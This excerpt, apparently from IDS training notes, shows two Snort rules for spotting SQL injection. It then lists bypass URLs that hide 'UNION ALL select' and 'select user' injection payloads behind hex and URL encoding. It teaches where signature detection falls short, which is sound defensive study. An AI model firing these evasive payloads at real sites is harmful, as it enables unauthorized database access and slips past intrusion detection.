Signature 3-5
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection SELECT
statement”; flow: to_server, established; pcre:”/select.*from.*(\-\-|\/\*|\#)/i”; sid: 2; rev: 1;)
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection UNION
statement”; flow: to_server, established; pcre:”/union.*(\-\-|\/\*|\#)/i”; sid: 3; rev: 1;)
Bypass Techniques:
http://[site]/page.asp?id=2 or 2 in (%73%65%6C%65%63%74%20%75%73%65%72)%2D%2D
http://[site]/page.asp?id=2 or 2 in (select user)--
http://[site]/page.asp?id=-2 %55%4E%49%4F%4E%20%41%4C%4C%20%73%65%6C%65%63%74%201,2,3,(%73%65%6C
%65%63%74%20%75%73%65%72),5,6,7%2D%2D
http://[site]/page.asp?id=-2 UNION ALL select 1,2,3,(select user),5,6,7--
....c'mon everyone name some more
Signature Negatives
- Although sigs 3-5 are much better, they don't consider the attacker may use different encoding types such as hex
Signature Based IDS (3-5)